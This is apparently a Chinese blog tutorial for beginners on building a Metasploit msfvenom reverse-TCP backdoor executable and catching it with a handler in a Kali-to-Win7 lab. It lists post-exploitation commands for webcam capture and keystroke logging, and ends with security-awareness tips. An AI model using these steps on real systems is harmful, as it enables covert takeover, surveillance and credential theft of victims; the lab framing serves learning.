渗透测试基础2

228 阅读3分钟
Msfvenom简介

msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。(简而言之 :生成恶意软件的工具)

正向连接和反向连接

正向连接是受害主机监听一个端口,由控制主机主动去连接受害者主机的过程,适用于受害者主机具有公网ip的情况下。

反向连接是控制主机监听一个端口,由受害者主机主动去连接控制主机,适用于受害者主机出网或没有公网ip的情况。反向连接不受防火墙的限制。

(简而言之:正向连接就像你给对方打电话,也打得通。而反向连接就是,对方拉黑了你,你打不通,只能对方打你电话)

用msfvenom制作恶意软件,用反向连接方式渗透攻击演示

软件:Vmware Workstation 14

攻击机:Kali

靶机环境:Win7

工具:

msfvenom生成恶意软件工具

Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具

1.打开kali,获取root权限
sudo su-kali

image.png

2.使用msfvenom生成恶意软件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.128 LPORT=6060 -f exe>666.exe

image.png “LHOST=”后面填写的为使用kali的ip地址,“LPORT=”后面为端口名(可以随意指定一个后面要用),“exe>”后面填写的为软件名(可以随意取)。如图出现白字部分内容,且软件图样如图所示,则恶意软件生成成功。

3.启动Metasploit
msfconsole

image.png

然后就可以使用其中的模块了

4.Metasploit设置侦听
use exploit/multi/handler    (加载模块)
set payload windows/meterpreter/reverse_tcp  (设置payload)
set lhost 192.168.116.128  (设置kali的ip)
set lport 6060  (设置kali的端口lport=6060)
exploit  (执行)

image.png

如图所示则设置完成

5.将生成的软件上传至win7并运行(先将软件粘贴到物理机再粘贴到win7)

image.png

image.png

如图所示则成功启动,接下来可使用meterpreter进行一系列后渗透攻击

6.后渗透攻击演示

截屏

screenshot

image.png 在此不过多演示

后渗透命令拓展

screenshot //桌面截图

shell //进入DOS系统,受害者win7的命令行

chcp 65001 //改变编码方式,改乱码

whoami //查看受害者当前用户及权限(Windows系统最高权限:system)

exit //从命令行退回meterpreter

webcam_list //检测摄像头设备

webcam_snap //拍照

webcam_stream //摄影,视频

ps //查看windows系统运行进程

migrate-P //进程的PID

keyscan_start //开始监听

keyscan_dump //获取监听

keyscan_stop //停止监听

网络安全意识防范

该方式可能出现在生活中的方方面面,例如街上有人送一些小玩偶小挂件小扇子之类让你微信扫个码,可能就是他人制作的恶意软件病毒木马(作者本人扫过,寄QAQ);例如夜深人静时在暗戳戳的小角落里的“无视风险”安装(对,没错,说的就是你),软件里就可能带着木马病毒;例如某些网站链接同样会带有木马病毒。

为了自身隐私安全着想,应:

1.不连接公共网络。连接公共网络会合黑客处于同一网段。

2.不随意点开链接。链接里自带木马病毒。

3.不随意下载应用软件。非官网下载可能他人已经提前捆绑了恶意程序。

4.不要为了小扇子小玩偶去路上扫码。

同时提高自我防范意识和警惕性,不贪小便宜,牢记天上不会掉馅饼只会掉陷阱。

**以上皆为作者拙见,仅做网络安全学习参考。 **